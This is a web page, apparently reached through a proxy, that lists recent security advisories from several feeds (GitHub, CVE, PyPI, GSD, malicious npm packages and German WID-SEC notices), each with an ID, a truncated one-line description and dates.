[go: up one dir, main page]
More Web Proxy on the site http://driver.im/

Recent vulnerabilities


Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
ghsa-7hvr-6xmx-44vf The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scrip… 2024-12-23T06:30:45Z 2024-12-23T06:30:45Z
ghsa-xpmr-c35p-q4rw home 5G HR02, Wi-Fi STATION SH-52B, and Wi-Fi STATION SH-54C contain an OS command injection vulner… 2024-12-23T03:30:47Z 2024-12-23T03:30:47Z
ghsa-v3gr-mcr8-2wv5 Multiple SHARP routers leave the hidden debug function enabled. An arbitrary OS command may be exec… 2024-12-23T03:30:47Z 2024-12-23T03:30:47Z
ghsa-q495-wf8m-qxcf A vulnerability classified as critical has been found in FoxCMS up to 1.2. Affected is an unknown f… 2024-12-23T03:30:47Z 2024-12-23T03:30:47Z
ghsa-c7c2-9xjm-5c75 A vulnerability classified as critical was found in FoxCMS up to 1.2. Affected by this vulnerabilit… 2024-12-23T03:30:47Z 2024-12-23T03:30:47Z
ghsa-9g8r-v4m3-ff3f A vulnerability was found in 1000 Projects Attendance Tracking Management System 1.0. It has been d… 2024-12-23T03:30:47Z 2024-12-23T03:30:47Z
ghsa-8758-pjv9-3f3j home 5G HR02, Wi-Fi STATION SH-52B, and Wi-Fi STATION SH-54C contain a buffer overflow vulnerabilit… 2024-12-23T03:30:47Z 2024-12-23T03:30:47Z
ghsa-6mmh-m294-9j5g A vulnerability was found in 1000 Projects Attendance Tracking Management System 1.0. It has been r… 2024-12-23T03:30:47Z 2024-12-23T03:30:47Z
ghsa-3wvw-x258-gj48 home 5G HR02 and Wi-Fi STATION SH-54C contain an OS command injection vulnerability in the configur… 2024-12-23T03:30:47Z 2024-12-23T03:30:47Z
ghsa-33wm-fghj-g69f Multiple SHARP routers contain an improper authentication vulnerability in the configuration backup… 2024-12-23T03:30:47Z 2024-12-23T03:30:47Z
ghsa-h369-f67q-2q4c libpoppler.so in Poppler through 24.12.0 has an out-of-bounds read vulnerability within the JBIG2Bi… 2024-12-23T00:30:54Z 2024-12-23T00:30:54Z
ghsa-cpq8-gjrv-h7mr A vulnerability was found in Intelbras VIP S3020 G2, VIP S4020 G2, VIP S4020 G3 and VIP S4320 G2 up… 2024-12-23T00:30:54Z 2024-12-23T00:30:54Z
ghsa-58gj-55xv-pwhg A stored cross-site scripting (XSS) vulnerability in the Calendar feature of REDCap through 15.0.0 … 2024-12-23T00:30:54Z 2024-12-23T00:30:54Z
ghsa-533g-7w58-g89m An integer underflow was discovered in Fort 1.6.3 and 1.6.4 before 1.6.5. A malicious RPKI reposito… 2024-12-23T00:30:54Z 2024-12-23T00:30:54Z
ghsa-3q7m-2c53-555m A stored cross-site scripting (XSS) vulnerability in the Project name of REDCap through 15.0.0 allo… 2024-12-23T00:30:54Z 2024-12-23T00:30:54Z
ghsa-325m-pvh6-hvj7 A vulnerability was found in Intelbras VIP S3020 G2, VIP S4020 G2, VIP S4020 G3 and VIP S4320 G2 up… 2024-12-23T00:30:54Z 2024-12-23T00:30:54Z
ghsa-crw4-8858-pw4f A stored cross-site scripting (XSS) vulnerability in the Project Dashboard name of REDCap through 1… 2024-12-23T00:30:53Z 2024-12-23T00:30:53Z
ghsa-rfmp-w9w5-rmhv REDCap through 15.0.0 has a security flaw in the Project Dashboards name, exposing users to a Cross… 2024-12-22T21:30:45Z 2024-12-22T21:30:45Z
ghsa-j4wx-3rpr-2939 REDCap through 15.0.0 has a security flaw in the Notes section of calendar events, exposing users t… 2024-12-22T21:30:45Z 2024-12-22T21:30:45Z
ghsa-v257-5gpw-8qxg A vulnerability has been found in TreasureHuntGame TreasureHunt up to 963e0e0 and classified as cri… 2024-12-22T15:31:04Z 2024-12-22T15:31:04Z
ghsa-g3cv-w4gv-6jgv A vulnerability, which was classified as critical, was found in TreasureHuntGame TreasureHunt up to… 2024-12-22T12:30:45Z 2024-12-22T12:30:45Z
ghsa-jwxw-j5g6-8jj9 A vulnerability classified as problematic was found in code-projects Online Exam Mastering System 1… 2024-12-22T09:30:43Z 2024-12-22T09:30:43Z
ghsa-g6jw-mv8g-f526 A vulnerability, which was classified as problematic, has been found in Portabilis i-Educar up to 2… 2024-12-22T09:30:43Z 2024-12-22T09:30:43Z
ghsa-qx84-qqqw-x28w A vulnerability classified as critical has been found in code-projects Online Exam Mastering System… 2024-12-22T09:30:42Z 2024-12-22T09:30:42Z
ghsa-fx37-r27p-w9f7 A code injection vulnerability in HMS Networks Ewon Flexy 205 allows executing commands on system l… 2024-12-19T18:31:37Z 2024-12-22T09:30:42Z
ghsa-mv2q-w9m6-283h A vulnerability was found in code-projects Online Exam Mastering System 1.0. It has been rated as c… 2024-12-22T06:30:45Z 2024-12-22T06:30:45Z
ghsa-f8mq-v5j8-fgcq The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remo… 2024-12-22T03:30:44Z 2024-12-22T03:30:44Z
ghsa-gv7v-rgg6-548h Laravel environment manipulation via query string 2024-11-12T22:08:42Z 2024-12-21T18:30:49Z
ghsa-x5px-7xqx-qr2x A vulnerability was found in code-projects Job Recruitment 1.0. It has been declared as problematic… 2024-12-21T15:30:32Z 2024-12-21T15:30:32Z
ghsa-fqvv-mh7w-3jq3 IBM i 7.3, 7.4, and 7.5 is vulnerable to bypassing Navigator for i interface restrictions. By send… 2024-12-21T15:30:32Z 2024-12-21T15:30:32Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Description Vendor Product Published Updated
cve-2024-0874 5.3 (v3.1) Coredns: cd bit response is cached and served later

2024-04-25T16:22:44.182Z 2024-12-23T07:13:09.512Z
cve-2024-3727 8.3 (v3.1) Containers/image: digest type does not guarantee valid type

2024-05-09T14:57:21.327Z 2024-12-23T07:03:39.627Z
cve-2024-1394 7.5 (v3.1) Golang-fips/openssl: memory leaks in code encrypting a… Red Hat
Red Hat Ansible Automation Platform 2.4 for RHEL 8
2024-03-21T12:16:38.790Z 2024-12-23T06:24:59.424Z
cve-2024-50623 N/A In Cleo Harmony before 5.8.0.21, VLTrader before … n/a
n/a
2024-10-27T00:00:00 2024-12-23T06:22:00.892Z
cve-2023-39417 7.5 (v3.1) Postgresql: extension script @substitutions@ within qu… Red Hat
Red Hat Advanced Cluster Security 4.2
2023-08-11T12:19:15.108Z 2024-12-23T05:37:46.065Z
cve-2024-21726 N/A [20240205] - Core - Inadequate content filtering withi… Joomla! Project
Joomla! CMS
2024-02-20T16:22:36.946Z 2024-12-23T04:34:34.293Z
cve-2024-40744 N/A Extension - tassos.gr - Unrestricted file upload in Co… tassos.gr
Convert Forms component for Joomla
2024-12-04T15:01:50.739Z 2024-12-23T04:34:18.706Z
cve-2024-40745 N/A Extension - tassos.gr - Reflected Cross site scripting… tassos.gr
Convert Forms component for Joomla
2024-12-04T15:02:05.517Z 2024-12-23T04:34:15.863Z
cve-2024-11230 Elementor Header & Footer Builder <= 1.6.46 - Authenti… brainstormforce
Ultimate Addons for Elementor (Formerly Elementor Header & Footer Builder)
2024-12-23T04:23:13.165Z 2024-12-23T04:23:13.165Z
cve-2024-12901 FoxCMS API Endpoint Site.php improper authorization n/a
FoxCMS
2024-12-23T02:00:12.678Z 2024-12-23T02:00:12.678Z
cve-2024-12900 FoxCMS Configuration File installdb.php code injection n/a
FoxCMS
2024-12-23T01:31:05.891Z 2024-12-23T01:31:05.891Z
cve-2024-12899 1000 Projects Attendance Tracking Management System co… 1000 Projects
Attendance Tracking Management System
2024-12-23T00:31:04.662Z 2024-12-23T00:31:04.662Z
cve-2024-54082 7.2 (v3.0) home 5G HR02 and Wi-Fi STATION SH-54C contain an … Sharp Corporation
home 5G HR02
2024-12-23T00:18:12.865Z 2024-12-23T00:18:12.865Z
cve-2024-52321 5.9 (v3.0) Multiple SHARP routers contain an improper authen… Sharp Corporation
home 5G HR02
2024-12-23T00:18:08.358Z 2024-12-23T00:18:08.358Z
cve-2024-47864 5.3 (v3.0) home 5G HR02, Wi-Fi STATION SH-52B, and Wi-Fi STA… Sharp Corporation
home 5G HR02
2024-12-23T00:18:03.318Z 2024-12-23T00:18:03.318Z
cve-2024-46873 9.8 (v3.0) Multiple SHARP routers leave the hidden debug fun… Sharp Corporation
home 5G HR02
2024-12-23T00:17:59.216Z 2024-12-23T00:17:59.216Z
cve-2024-45721 7.2 (v3.0) home 5G HR02, Wi-Fi STATION SH-52B, and Wi-Fi STA… Sharp Corporation
home 5G HR02
2024-12-23T00:17:55.581Z 2024-12-23T00:17:55.581Z
cve-2024-12898 1000 Projects Attendance Tracking Management System fa… 1000 Projects
Attendance Tracking Management System
2024-12-23T00:00:21.643Z 2024-12-23T00:00:21.643Z
cve-2024-56378 N/A libpoppler.so in Poppler through 24.12.0 has an o… n/a
n/a
2024-12-22T00:00:00 2024-12-22T23:32:43.261713
cve-2024-12897 Intelbras VIP S4320 G2 Web Interface Sha1Account1 path… Intelbras
VIP S3020 G2
2024-12-22T23:31:05.102Z 2024-12-22T23:31:05.102Z
cve-2024-12896 Intelbras VIP S4320 G2 Web Interface webCapsConfig inf… Intelbras
VIP S3020 G2
2024-12-22T23:00:12.200Z 2024-12-22T23:00:12.200Z
cve-2024-56375 N/A An integer underflow was discovered in Fort 1.6.3… n/a
n/a
2024-12-22T00:00:00 2024-12-22T22:25:03.618780
cve-2024-56314 N/A A stored cross-site scripting (XSS) vulnerability… n/a
n/a
2024-12-22T00:00:00 2024-12-22T21:09:53.533331
cve-2024-56313 N/A A stored cross-site scripting (XSS) vulnerability… n/a
n/a
2024-12-22T00:00:00 2024-12-22T21:09:10.812684
cve-2024-56312 N/A A stored cross-site scripting (XSS) vulnerability… n/a
n/a
2024-12-22T00:00:00 2024-12-22T21:08:19.032183
cve-2024-56311 N/A REDCap through 15.0.0 has a security flaw in the … n/a
n/a
2024-12-22T00:00:00 2024-12-22T21:07:15.573497
cve-2024-56310 N/A REDCap through 15.0.0 has a security flaw in the … n/a
n/a
2024-12-22T00:00:00 2024-12-22T21:06:05.325212
cve-2024-12895 TreasureHuntGame TreasureHunt checkflag.php console_lo… TreasureHuntGame
TreasureHunt
2024-12-22T14:00:13.671Z 2024-12-22T14:00:13.671Z
cve-2024-12894 TreasureHuntGame TreasureHunt acesso.php sql injection TreasureHuntGame
TreasureHunt
2024-12-22T12:00:13.449Z 2024-12-22T12:00:13.449Z
cve-2024-12893 Portabilis i-Educar Tipo de Usuário Page 2 cross site … Portabilis
i-Educar
2024-12-22T08:00:13.237Z 2024-12-22T08:00:13.237Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Description Vendor Product Published Updated
cve-2024-50623 N/A In Cleo Harmony before 5.8.0.21, VLTrader before … n/a
n/a
2024-10-27T00:00:00 2024-12-23T06:22:00.892Z
cve-2024-11230 Elementor Header & Footer Builder <= 1.6.46 - Authenti… brainstormforce
Ultimate Addons for Elementor (Formerly Elementor Header & Footer Builder)
2024-12-23T04:23:13.165Z 2024-12-23T04:23:13.165Z
cve-2024-12901 FoxCMS API Endpoint Site.php improper authorization n/a
FoxCMS
2024-12-23T02:00:12.678Z 2024-12-23T02:00:12.678Z
cve-2024-12900 FoxCMS Configuration File installdb.php code injection n/a
FoxCMS
2024-12-23T01:31:05.891Z 2024-12-23T01:31:05.891Z
cve-2024-54082 7.2 (v3.0) home 5G HR02 and Wi-Fi STATION SH-54C contain an … Sharp Corporation
home 5G HR02
2024-12-23T00:18:12.865Z 2024-12-23T00:18:12.865Z
cve-2024-52321 5.9 (v3.0) Multiple SHARP routers contain an improper authen… Sharp Corporation
home 5G HR02
2024-12-23T00:18:08.358Z 2024-12-23T00:18:08.358Z
cve-2024-47864 5.3 (v3.0) home 5G HR02, Wi-Fi STATION SH-52B, and Wi-Fi STA… Sharp Corporation
home 5G HR02
2024-12-23T00:18:03.318Z 2024-12-23T00:18:03.318Z
cve-2024-46873 9.8 (v3.0) Multiple SHARP routers leave the hidden debug fun… Sharp Corporation
home 5G HR02
2024-12-23T00:17:59.216Z 2024-12-23T00:17:59.216Z
cve-2024-45721 7.2 (v3.0) home 5G HR02, Wi-Fi STATION SH-52B, and Wi-Fi STA… Sharp Corporation
home 5G HR02
2024-12-23T00:17:55.581Z 2024-12-23T00:17:55.581Z
cve-2024-12899 1000 Projects Attendance Tracking Management System co… 1000 Projects
Attendance Tracking Management System
2024-12-23T00:31:04.662Z 2024-12-23T00:31:04.662Z
cve-2024-12898 1000 Projects Attendance Tracking Management System fa… 1000 Projects
Attendance Tracking Management System
2024-12-23T00:00:21.643Z 2024-12-23T00:00:21.643Z
cve-2024-56378 N/A libpoppler.so in Poppler through 24.12.0 has an o… n/a
n/a
2024-12-22T00:00:00 2024-12-22T23:32:43.261713
cve-2024-12897 Intelbras VIP S4320 G2 Web Interface Sha1Account1 path… Intelbras
VIP S3020 G2
2024-12-22T23:31:05.102Z 2024-12-22T23:31:05.102Z
cve-2024-56375 N/A An integer underflow was discovered in Fort 1.6.3… n/a
n/a
2024-12-22T00:00:00 2024-12-22T22:25:03.618780
cve-2024-12896 Intelbras VIP S4320 G2 Web Interface webCapsConfig inf… Intelbras
VIP S3020 G2
2024-12-22T23:00:12.200Z 2024-12-22T23:00:12.200Z
cve-2024-56314 N/A A stored cross-site scripting (XSS) vulnerability… n/a
n/a
2024-12-22T00:00:00 2024-12-22T21:09:53.533331
cve-2024-56313 N/A A stored cross-site scripting (XSS) vulnerability… n/a
n/a
2024-12-22T00:00:00 2024-12-22T21:09:10.812684
cve-2024-56312 N/A A stored cross-site scripting (XSS) vulnerability… n/a
n/a
2024-12-22T00:00:00 2024-12-22T21:08:19.032183
cve-2024-56311 N/A REDCap through 15.0.0 has a security flaw in the … n/a
n/a
2024-12-22T00:00:00 2024-12-22T21:07:15.573497
cve-2024-56310 N/A REDCap through 15.0.0 has a security flaw in the … n/a
n/a
2024-12-22T00:00:00 2024-12-22T21:06:05.325212
cve-2024-12895 TreasureHuntGame TreasureHunt checkflag.php console_lo… TreasureHuntGame
TreasureHunt
2024-12-22T14:00:13.671Z 2024-12-22T14:00:13.671Z
cve-2024-12894 TreasureHuntGame TreasureHunt acesso.php sql injection TreasureHuntGame
TreasureHunt
2024-12-22T12:00:13.449Z 2024-12-22T12:00:13.449Z
cve-2024-12893 Portabilis i-Educar Tipo de Usuário Page 2 cross site … Portabilis
i-Educar
2024-12-22T08:00:13.237Z 2024-12-22T08:00:13.237Z
cve-2024-12892 code-projects Online Exam Mastering System sign.php cr… code-projects
Online Exam Mastering System
2024-12-22T07:31:06.776Z 2024-12-22T07:31:06.776Z
cve-2024-9154 8.6 (v4.0) Authenticated Remote Code Execution HMS Networks
Ewon Flexy 205
2024-12-19T15:59:53.367Z 2024-12-22T07:02:34.459Z
cve-2024-12891 code-projects Online Exam Mastering System account.php… code-projects
Online Exam Mastering System
2024-12-22T06:31:06.289Z 2024-12-22T06:31:06.289Z
cve-2024-12890 code-projects Online Exam Mastering System update.php … code-projects
Online Exam Mastering System
2024-12-22T06:00:11.940Z 2024-12-22T06:00:11.940Z
cve-2024-11852 Element Pack Elementor Addons (Header Footer, Template… bdthemes
Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows)
2024-12-22T01:41:59.748Z 2024-12-22T01:41:59.748Z
cve-2024-52301 Laravel allows environment manipulation via query string laravel
framework
2024-11-12T19:32:14.415Z 2024-12-21T17:02:39.839Z
cve-2024-51464 4.3 (v3.1) IBM i improper HTTP header neutralization IBM
i
2024-12-21T13:44:59.157Z 2024-12-21T13:44:59.157Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
pysec-2022-43162 Redis v7.0 was discovered to contain a memory leak via the component streamGetEdgeID. 2022-06-23T17:15:00Z 2024-12-20T18:23:42.243817Z
pysec-2024-85 Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsDB platform… 2024-09-12T13:15:00Z 2024-12-19T17:21:34.539899Z
pysec-2024-84 Deserialization of untrusted data can occur in versions 23.10.3.0 and newer of the MindsDB platform… 2024-09-12T13:15:00Z 2024-12-19T17:21:34.455593Z
pysec-2024-83 Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsDB platform… 2024-09-12T13:15:00Z 2024-12-19T17:21:34.375092Z
pysec-2024-82 Deserialization of untrusted data can occur in versions 23.3.2.0 and newer of the MindsDB platform,… 2024-09-12T13:15:00Z 2024-12-19T17:21:34.291111Z
pysec-2023-278 MindsDB connects artificial intelligence models to real time data. Versions prior to 23.11.4.1 cont… 2023-12-11T21:15:00Z 2024-12-19T17:21:34.094568Z
pysec-2019-253 Tahoe-LAFS 1.9.0 fails to ensure integrity which allows remote attackers to corrupt mutable files o… 2019-11-07T18:15:00Z 2024-12-19T05:47:49.035329Z
pysec-2024-111 A path traversal vulnerability exists in the `getFullPath` method of langchain-ai/langchainjs versi… 2024-10-29T13:15:00Z 2024-12-18T20:48:18.641809Z
pysec-2019-255 data/interfaces/default/history.html in Tautulli 2.1.26 has XSS via a crafted Plex username that is… 2019-02-19T16:29:00Z 2024-12-18T17:35:31.249266Z
pysec-2019-254 In Tautulli 2.1.9, CSRF in the /shutdown URI allows an attacker to shut down the remote media serve… 2019-12-18T18:15:00Z 2024-12-18T17:35:31.184121Z
pysec-2020-343 blosc2.c in Blosc C-Blosc2 through 2.0.0.beta.5 has a heap-based buffer overflow when there is a la… 2020-11-27T20:15:00Z 2024-12-12T14:22:45.450508Z
pysec-2024-154 Ultralytics has identified a supply chain attack affecting affecting multiple versions of the ultra… 2024-12-10T19:20:27.097505+00:00
pysec-2015-42 providers/saml2/admin.py in the Identity Provider (IdP) server in Ipsilon 0.1.0 before 1.0.2 and 1.… 2015-11-17T15:59:00Z 2024-12-05T09:35:27.751929Z
pysec-2015-41 providers/saml2/admin.py in the Identity Provider (IdP) server in Ipsilon 0.1.0 before 1.0.1 does n… 2015-11-17T15:59:00Z 2024-12-05T09:35:27.711043Z
pysec-2021-125 A flaw was found in Ansible where the secret information present in async_files are getting disclos… 2021-06-09T12:15:00Z 2024-12-03T18:23:29.400148Z
pysec-2019-251 The modoboa-dmarc plugin 1.1.0 for Modoboa is vulnerable to an XML External Entity Injection (XXE) … 2019-12-10T20:15:00Z 2024-12-02T10:49:36.349040Z
pysec-2023-298 isInList in the safeurl-python package before 1.2 for Python has an insufficiently restrictive regu… 2023-01-30T05:15:00Z 2024-11-25T22:26:07.130924Z
pysec-2011-25 Unspecified vulnerability in (1) Zope 2.12.x before 2.12.19 and 2.13.x before 2.13.8, as used in Pl… 2011-07-19T20:55:00Z 2024-11-25T22:26:05.519360Z
pysec-2023-270 A flaw was found in openstack-glance. This issue could allow a remote, authenticated attacker to ta… 2023-03-06T23:15:00Z 2024-11-25T22:26:00.352650Z
pysec-2022-43071 api-res-py package in PyPI 0.1 is vulnerable to a code execution backdoor in the request package. 2022-06-08T20:15:00Z 2024-11-25T22:25:53.019921Z
pysec-2022-43069 Apache IoTDB version 0.13.0 is vulnerable by session id attack. Users should upgrade to version 0.1… 2022-09-05T10:15:00Z 2024-11-25T22:25:52.941293Z
pysec-2022-43174 WMAgent v1.3.3rc2 and 1.3.3rc1, reqmgr 2 1.4.1rc5 and 1.4.0rc2, reqmon 1.4.1rc5, and global-workque… 2022-07-28T23:15:00Z 2024-11-25T22:09:33.909779Z
pysec-2022-43163 WMAgent v1.3.3rc2 and 1.3.3rc1, reqmgr 2 1.4.1rc5 and 1.4.0rc2, reqmon 1.4.1rc5, and global-workque… 2022-07-28T23:15:00Z 2024-11-25T22:09:33.909779Z
pysec-2022-43151 Patchelf v0.9 was discovered to contain an out-of-bounds read via the function modifyRPath at src/p… 2022-12-19T22:15:00Z 2024-11-25T22:09:33.909779Z
pysec-2022-43136 WMAgent v1.3.3rc2 and 1.3.3rc1, reqmgr 2 1.4.1rc5 and 1.4.0rc2, reqmon 1.4.1rc5, and global-workque… 2022-07-28T23:15:00Z 2024-11-25T22:09:33.909779Z
pysec-2022-43134 The exotel (aka exotel-py) package in PyPI as of 0.1.6 includes a code execution backdoor inserted … 2022-08-27T20:15:00Z 2024-11-25T22:09:33.909779Z
pysec-2019-243 Designate does not enforce the DNS protocol limit concerning record set sizes 2019-11-22T15:15:00Z 2024-11-25T22:09:33.909779Z
pysec-2017-114 Designate 2015.1.0 through 1.0.0.0b1 as packaged in OpenStack Kilo does not enforce RecordSets per … 2017-08-31T22:29:00Z 2024-11-25T22:09:33.909779Z
pysec-2006-4 Multiple heap-based buffer overflows in Libextractor 0.5.13 and earlier allow remote attackers to e… 2006-05-18T23:02:00Z 2024-11-25T22:09:33.909779Z
pysec-2024-153 Streamlit is a data oriented application development framework for python. Snowflake Streamlit open… 2024-08-12T17:15:17+00:00 2024-11-25T21:22:50.933853+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
gsd-2024-33884 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33901 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33887 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33895 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33894 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33902 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33888 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33885 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33891 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33899 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33889 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33893 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33892 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33890 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33896 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33903 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33900 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33898 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33886 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33897 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33883 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4303 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4300 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4297 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4301 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4296 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4299 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4302 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4298 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33876 The format of the source doesn't require a description, click on the link for more details
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
mal-2024-11205 Malicious code in @wix-platform/velo-multilingual-helper-backend (npm) 2024-12-05T12:37:46Z 2024-12-05T12:37:46Z
mal-2024-11204 Malicious code in cdp-agentkit-core (npm) 2024-12-05T10:35:51Z 2024-12-05T10:35:51Z
mal-2024-7895 Malicious code in lit-3 (npm) 2024-08-05T18:53:26Z 2024-12-05T09:06:36Z
mal-2024-11203 Malicious code in finn-pulse-init (npm) 2024-12-05T07:58:04Z 2024-12-05T08:07:42Z
mal-2024-11202 Malicious code in buoyant-utils (npm) 2024-12-05T05:57:35Z 2024-12-05T05:57:35Z
mal-2024-11201 Malicious code in coldbox (npm) 2024-12-05T04:54:20Z 2024-12-05T05:06:49Z
mal-2024-11200 Malicious code in quintoandar-jwt (npm) 2024-12-05T00:55:28Z 2024-12-05T00:55:28Z
mal-2024-10914 Malicious code in veworld-mock (npm) 2024-11-24T20:43:19Z 2024-12-05T00:35:15Z
mal-2024-10912 Malicious code in quorumnetworktester (npm) 2024-11-24T18:53:52Z 2024-12-05T00:35:15Z
mal-2024-10911 Malicious code in plaid-tiny-quickstart (npm) 2024-11-24T16:15:48Z 2024-12-05T00:35:15Z
mal-2024-10572 Malicious code in xcasset-gen (npm) 2024-11-08T12:05:36Z 2024-12-05T00:35:15Z
mal-2024-10570 Malicious code in spliffy-benchmark (npm) 2024-11-08T13:58:58Z 2024-12-05T00:35:15Z
mal-2024-10569 Malicious code in quill-icons-park (npm) 2024-11-08T12:25:57Z 2024-12-05T00:35:15Z
mal-2024-10566 Malicious code in pixiv-novel-editor (npm) 2024-11-08T12:13:43Z 2024-12-05T00:35:15Z
mal-2024-10534 Malicious code in sinbad-dev (npm) 2024-11-08T11:45:22Z 2024-12-05T00:35:15Z
mal-2024-2055 Malicious code in d11-foo (npm) 2024-06-25T12:35:11Z 2024-12-05T00:35:14Z
mal-2024-11183 Malicious code in @solana/web3.js (npm) 2024-12-03T22:45:37Z 2024-12-05T00:35:14Z
mal-2024-10909 Malicious code in lunar-root (npm) 2024-11-24T23:02:20Z 2024-12-05T00:35:14Z
mal-2024-10908 Malicious code in jigasi-haproxy-agent (npm) 2024-11-24T18:18:29Z 2024-12-05T00:35:14Z
mal-2024-10907 Malicious code in generate-release-description (npm) 2024-11-24T22:43:11Z 2024-12-05T00:35:14Z
mal-2024-10906 Malicious code in eth-based-p2p-e2e-latency (npm) 2024-11-24T20:26:35Z 2024-12-05T00:35:14Z
mal-2024-10905 Malicious code in dashlane-vscode (npm) 2024-11-24T15:55:46Z 2024-12-05T00:35:14Z
mal-2024-10904 Malicious code in d1-northwind (npm) 2024-11-24T22:07:48Z 2024-12-05T00:35:14Z
mal-2024-10903 Malicious code in clarity-vs-code-web-client (npm) 2024-11-24T23:51:51Z 2024-12-05T00:35:14Z
mal-2024-10902 Malicious code in clarity-lsp (npm) 2024-11-25T00:20:45Z 2024-12-05T00:35:14Z
mal-2024-10562 Malicious code in mongoose-4 (npm) 2024-11-08T14:24:20Z 2024-12-05T00:35:14Z
mal-2024-10560 Malicious code in immutable-axelar-bridge (npm) 2024-11-07T23:29:15Z 2024-12-05T00:35:14Z
mal-2024-10559 Malicious code in embrace-helloworld (npm) 2024-11-08T11:40:54Z 2024-12-05T00:35:14Z
mal-2024-10558 Malicious code in dancer-pipeline (npm) 2024-11-08T13:15:53Z 2024-12-05T00:35:14Z
mal-2024-10557 Malicious code in com.immutable.orderbook (npm) 2024-11-08T00:08:13Z 2024-12-05T00:35:14Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
wid-sec-w-2024-3615 Zammad: Schwachstelle ermöglicht Offenlegung von Informationen 2024-12-04T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3614 IBM InfoSphere Information Server: Mehrere Schwachstellen 2024-12-04T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3613 IBM App Connect Enterprise: Schwachstelle ermöglicht Codeausführung 2024-12-04T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3612 Drupal: Mehrere Schwachstellen 2024-12-04T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3611 Joomla: Schwachstelle ermöglicht Cross-Site Scripting 2024-12-04T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3610 Cisco NX-OS: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen 2024-12-04T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3609 Django: Mehrere Schwachstellen 2024-12-04T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3608 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service 2024-12-04T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3585 Google Chrome: Schwachstelle ermöglicht Codeausführung 2024-12-03T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3569 Red Hat Enterprise Linux (python-tornado): Schwachstelle ermöglicht Denial of Service 2024-12-01T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3557 WebKit: Mehrere Schwachstellen ermöglichen Cross-Site Scripting und und Code-Ausführung 2024-11-27T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3549 Mozilla Firefox und Thunderbird: Mehrere Schwachstellen 2024-11-26T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3488 Red Hat OpenShift Container Platform: Mehrere Schwachstellen 2024-11-18T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3475 PostgreSQL: Mehrere Schwachstellen 2024-11-14T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3464 Mozilla Thunderbird: Schwachstelle ermöglicht Offenlegung von Informationen 2024-11-13T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3463 Python: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen 2024-11-13T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3461 Red Hat Enterprise Linux (WebKitGTK): Mehrere Schwachstellen 2024-11-13T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3403 IBM WebSphere Application Server: Schwachstelle ermöglicht Cross-Site Scripting 2024-11-11T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3334 IBM WebSphere Anwendungsserver: Schwachstelle ermöglicht Denial of Service und Informationsoffenlegung 2024-11-04T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3276 Ruby: Schwachstelle ermöglicht Denial of Service 2024-10-27T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
